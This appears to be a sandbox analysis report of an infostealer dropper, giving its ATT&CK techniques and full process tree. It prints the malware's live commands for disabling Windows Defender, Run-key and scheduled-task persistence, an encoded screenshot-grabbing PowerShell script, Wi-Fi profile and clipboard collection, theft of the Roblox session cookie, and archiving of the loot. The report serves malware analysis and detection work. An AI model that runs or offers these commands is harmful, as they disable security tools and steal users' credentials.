PID 3108 wrote to memory of 4988	3108	WindowsDefenderUpdater.exe	123
PID 3108 wrote to memory of 4988	3108	WindowsDefenderUpdater.exe	123
PID 2324 wrote to memory of 3328	2324	cmd.exe	128
PID 2324 wrote to memory of 3328	2324	cmd.exe	128
PID 4304 wrote to memory of 2684	4304	cmd.exe	129
PID 4304 wrote to memory of 2684	4304	cmd.exe	129
PID 4988 wrote to memory of 4964	4988	cmd.exe	130
PID 4988 wrote to memory of 4964	4988	cmd.exe	130
PID 640 wrote to memory of 1976	640	cmd.exe	131
PID 640 wrote to memory of 1976	640	cmd.exe	131
PID 2260 wrote to memory of 940	2260	cmd.exe	132
PID 2260 wrote to memory of 940	2260	cmd.exe	132
PID 1964 wrote to memory of 3396	1964	cmd.exe	133
PID 1964 wrote to memory of 3396	1964	cmd.exe	133

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 10 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5368	attrib.exe
4708	attrib.exe
5480	attrib.exe
1964	attrib.exe
5604	Process not Found
5756	attrib.exe
5776	attrib.exe
5768	attrib.exe
2384	attrib.exe
3708	Process not Found

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1148
- C:\Users\Admin\AppData\Local\Temp\Files\lummnew.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\lummnew.exe"
  2⤵
  - Executes dropped EXE
  PID:1468
- C:\Users\Admin\AppData\Local\Temp\Files\build9.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\build9.exe"
  2⤵
  - Executes dropped EXE
  PID:4420
- C:\Users\Admin\AppData\Local\Temp\Files\jerniuiopu.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\jerniuiopu.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4736
- - C:\Windows\SysWOW64\schtasks.exe
    "schtasks" /create /tn "NET framework" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\jerniuiopu.exe" /rl HIGHEST /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:5012
- C:\Users\Admin\AppData\Local\Temp\Files\Aquarius.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Aquarius.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4516
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B5F2.tmp\B5F3.tmp\B5F4.bat C:\Users\Admin\AppData\Local\Temp\Files\Aquarius.exe"
    3⤵
    - Drops file in System32 directory
    - Suspicious use of WriteProcessMemory
    PID:4252
  - - C:\Windows\system32\timeout.exe
      timeout 1
      4⤵
      PID:1308
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
      4⤵
      Adds Run key to start application
      PID:2272
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
      4⤵
      Adds Run key to start application
      PID:952
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
      4⤵
      PID:3536
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
      4⤵
      PID:4416
  - - C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
      "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3164
    - - C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:3108
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe'"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4304
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2684
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2324
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3328
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Could not open the file', 0, 'Error', 32+16);close()""
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:640
        
        C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Could not open the file', 0, 'Error', 32+16);close()"
        7⤵
        
        PID:1976
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2260
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:940
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4988
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4964
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        6⤵
        
        PID:2692
        
        C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
        7⤵
        
        PID:2128
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
        6⤵
        
        PID:2056
        
        C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
        7⤵
        
        PID:4072
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        6⤵
        
        PID:3796
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        7⤵
        Detects videocard installed
        Suspicious use of AdjustPrivilegeToken
        
        PID:2820
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        6⤵
        
        PID:3236
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        7⤵
        Detects videocard installed
        
        PID:4888
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        6⤵
        
        PID:1016
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        7⤵
        Enumerates processes with tasklist
        
        PID:2764
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        6⤵
        
        PID:1336
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        7⤵
        Enumerates processes with tasklist
        
        PID:4692
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        6⤵
        
        PID:4100
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        7⤵
        
        PID:4596
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        6⤵
        Clipboard Data
        
        PID:3704
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        7⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        
        PID:2480
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        6⤵
        
        PID:2208
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        7⤵
        Enumerates processes with tasklist
        
        PID:1276
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        6⤵
        
        PID:2724
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        7⤵
        
        PID:3056
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        6⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:408
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        7⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:1568
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        6⤵
        
        PID:4820
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        7⤵
        Gathers system information
        
        PID:4304
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
        6⤵
        
        PID:736
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:2820
        
        C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
        7⤵
        
        PID:1304
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        6⤵
        
        PID:4564
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1552
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\423asvt2\423asvt2.cmdline"
        8⤵
        
        PID:5976
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE704.tmp" "c:\Users\Admin\AppData\Local\Temp\423asvt2\CSCBACEDEDA80F6495296225CE99EED4454.TMP"
        9⤵
        
        PID:2324
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        6⤵
        
        PID:4408
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        7⤵
        
        PID:2988
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
        6⤵
        
        PID:4764
        
        C:\Windows\system32\attrib.exe
        
        attrib -r C:\Windows\System32\drivers\etc\hosts
        7⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:5368
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        6⤵
        
        PID:5340
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        7⤵
        
        PID:5652
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
        6⤵
        
        PID:5544
        
        C:\Windows\system32\attrib.exe
        
        attrib +r C:\Windows\System32\drivers\etc\hosts
        7⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:5756
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        6⤵
        
        PID:5880
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        7⤵
        
        PID:6032
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        6⤵
        
        PID:5964
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        7⤵
        Enumerates processes with tasklist
        
        PID:6080
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        6⤵
        
        PID:6112
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        7⤵
        
        PID:640
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        6⤵
        
        PID:5156
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        7⤵
        
        PID:2988
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        6⤵
        
        PID:6052
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:6032
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5896
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        6⤵
        
        PID:5148
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5696
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "getmac"
        6⤵
        
        PID:5376
        
        C:\Windows\system32\getmac.exe
        
        getmac
        7⤵
        
        PID:5400
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI31642\rar.exe a -r -hp"Aquarius" "C:\Users\Admin\AppData\Local\Temp\WGArS.zip" *"
        6⤵
        
        PID:5408
        
